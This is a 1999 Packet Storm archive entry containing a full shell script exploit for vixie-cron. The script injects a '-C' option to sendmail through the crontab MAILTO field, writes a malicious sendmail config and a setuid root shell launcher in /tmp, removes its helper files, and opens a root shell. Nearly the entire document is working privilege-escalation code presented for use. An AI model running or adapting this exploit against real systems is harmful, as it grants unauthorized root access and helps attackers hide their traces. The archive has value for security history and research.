rootcron.txt

1999-09-21T00:00:00
ID PACKETSTORM:15686
Type packetstorm
Reporter Packet Storm
Modified 1999-09-21T00:00:00

Description

                                        
                                            `#!/bin/sh  
  
clear  
  
echo '------------------------------------------------------------------'  
echo 'Marchew Hyperreal Industries <marchew@dione.ids.pl>'  
echo 'Stumilowy Las Team <100milowy@gdynia.ids.pl>'  
echo '---------------------------- presents ----------------------------'  
echo   
echo ' -= vixie-cron root sploit by Michal Zalewski <lcamtuf@ids.pl> =-'  
echo  
  
echo '[+] Checking dependencies:'  
  
echo -n ' [*] vixie crontab: '  
  
if [ -u /usr/bin/crontab -a -x /usr/bin/crontab ]; then  
echo "OK"  
else  
echo "NOT FOUND!"  
exit 1  
fi  
  
echo -n ' [*] Berkeley Sendmail: '  
  
if [ -f /usr/sbin/sendmail ]; then  
echo "OK"  
else  
echo "NOT FOUND!"  
exit 1  
fi  
  
echo -n ' [*] gcc compiler: '  
  
if [ -x /usr/bin/gcc ]; then  
echo "OK"  
else  
echo "NOT FOUND!"  
exit 1  
fi  
  
echo ' [?] Dependiences not verified:'  
echo ' [*] proper version of vixie crontab'  
echo ' [*] writable /tmp without noexec/nosuid option'  
echo '[+] Exploit started.'  
  
echo "[+] Setting up .cf file for sendmail..."  
  
cat >/tmp/vixie-cf <<__eof__  
V7/Berkeley  
  
O QueueDirectory=/tmp  
O DefaultUser=0:0  
  
R$+ \$#local $: \$1 regular local names  
  
Mlocal, P=/tmp/vixie-root, F=lsDFMAw5:/|@qSPfhn9, S=10/30, R=20/40,  
T=DNS/RFC822/X-Unix,  
A=vixie-root  
__eof__  
  
echo '[+] Setting up phase #1 tool (phase #2 tool compiler)...'  
  
cat >/tmp/vixie-root <<__eof__  
#!/bin/sh  
  
gcc /tmp/vixie-own3d.c -o /tmp/vixie-own3d  
chmod 6755 /tmp/vixie-own3d  
__eof__  
  
chmod 755 /tmp/vixie-root  
  
echo '[+] Setting up phase #2 tool (rootshell launcher)...'  
  
cat >/tmp/vixie-own3d.c <<__eof__  
main() {  
setuid(0);  
setgid(0);  
unlink("/tmp/vixie-own3d");  
execl("/bin/sh","sh","-i",0);  
}  
__eof__  
  
echo '[+] Putting evil crontab entry...'  
  
crontab - <<__eof__  
MAILTO='-C/tmp/vixie-cf dupek'  
* * * * * nonexist  
__eof__  
  
echo '[+] Patience is a virtue... Wait up to 60 seconds.'  
  
ILE=0  
  
echo -n '[+] Tick.'  
  
while [ $ILE -lt 50 ]; do  
sleep 2  
let ILE=ILE+1  
test -f /tmp/vixie-own3d && ILE=1000  
echo -n '.'  
done  
  
echo  
echo '[+] Huh, done. Removing crontab entry...'  
  
crontab -r  
  
echo '[+] Removing helper files...'  
  
rm -f /tmp/vixie-own3d.c /tmp/vixie-root /tmp/vixie-cf /tmp/df* /tmp/qf* &>/dev/null  
  
echo '[*] And now...'  
  
if [ -f /tmp/vixie-own3d ]; then  
echo '[+] Entering root shell, babe :)'  
echo  
/tmp/vixie-own3d  
echo  
else  
echo '[-] Oops, no root shell found, patched system or configuration problem :('  
fi  
  
echo '[*] Exploit done.'  
`